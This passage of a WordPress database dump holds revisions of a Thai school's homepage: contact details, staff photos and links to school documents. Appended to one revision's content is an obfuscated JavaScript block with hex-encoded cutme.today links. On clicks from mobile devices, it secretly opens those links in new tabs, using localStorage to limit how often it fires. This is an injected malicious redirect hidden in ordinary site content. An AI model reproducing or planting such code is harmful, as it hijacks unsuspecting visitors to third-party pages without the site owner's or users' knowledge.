{\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 15:48:00','2025-07-15 08:48:00','',19,'http://watprato.ssk.in.th/?p=699',0,'revision','',0),
(700,1,'2025-07-15 15:53:18','2025-07-15 08:53:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- 